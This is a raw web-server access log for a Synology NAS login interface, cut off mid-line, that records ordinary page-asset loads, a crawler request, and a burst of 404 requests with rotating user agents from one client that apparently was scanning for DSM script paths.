"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=1650348555" [Client 84.1.26.27] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 84.1.26.27] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=1650348555" [Client 84.1.26.27] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 84.1.26.27] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 84.1.26.27] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=1633587521" [Client 84.1.26.27] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 84.1.26.27] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 84.1.26.27] [Length 185] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 84.1.26.27] [Length 4629] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 84.1.26.27] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/sodium.js?v=1650348555" [Client 84.1.26.27] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.js?v=1678269761" [Client 84.1.26.27] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 84.1.26.27] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=1650348555" [Client 84.1.26.27] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 84.1.26.27] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 84.1.26.27] [Length 585179] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.wasm" [Client 84.1.26.27] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=40438" [Client 84.1.26.27] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/2.style.css" [Client 84.1.26.27] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 84.1.26.27] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 84.1.26.27] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 84.1.26.27] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 84.1.26.27] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 84.1.26.27] [Length 11206] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 84.1.26.27] [Length 100129] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login_background.jpg?id=1" [Client 84.1.26.27] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:16:07:16 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 44.226.198.245] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:21:15:59 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 72.11.155.223] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[13/Jan/2026:21:16:00 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 72.11.155.223] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://nas.profibot.hu/" +[14/Jan/2026:19:37:10 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 45.139.104.168] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/desktop/dist/dsm.desktop.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next)" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/noise/noise-c.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1220 Yowser/2.5 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ux/ux-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Twitterbot/1.0" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/login/dist/dsm.login.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/entry/dist/dsm.entry.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.0.1583 Yowser/2.5 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/noise/index.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; U; Android 7.0; en-US; PRA-LX1 Build/HUAWEIPRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ext-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/taskbar/dist/dsm.taskbar.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/76.0.3809.100 Chrome/76.0.3809.100 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/sds/dist/dsm.sds.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3887.0 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/unsupported-browsers/dist/bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/noise/constants.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/syno-vue-components/syno-vue-components.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/sds.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/sds/dist/dsm.common.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/vue-router/vue-router.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/vue/vue.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/vuex/vuex.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/synowebapi.js/synowebapi.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/vendor.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/noise/sodium.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 8.0.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/synocredential.js/synocredential.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)" "-" +[14/Jan/2026:19:37:27 +0000] - 404 404 - GET https nas.profibot.hu "/scrollbar/flexcroll.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" "-" +[14/Jan/2026:19:37:29 +0000] - 404 404 - GET https nas.profibot.hu "/babel-polyfill/polyfill.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" "-" +[14/Jan/2026:19:37:31 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/adapter/ext/ext-base.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/unsupported-browsers/dist/bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/synowebapi.js/synowebapi.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/synocredential.js/synocredential.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/taskbar/dist/dsm.taskbar.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/vendor.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 7.1.2; Nexus 6P Build/N2G48C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/vue-router/vue-router.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/vuex/vuex.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ux/ux-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/desktop/dist/dsm.desktop.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/babel-polyfill/polyfill.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ext-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/noise/constants.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; Pixel 2 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/adapter/ext/ext-base.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/login/dist/dsm.login.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 8.1.0; Redmi Y2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/entry/dist/dsm.entry.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/vue/vue.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "SearchExpress" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/noise/index.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/noise/noise-c.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/noise/sodium.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/scrollbar/flexcroll.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/sds.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu 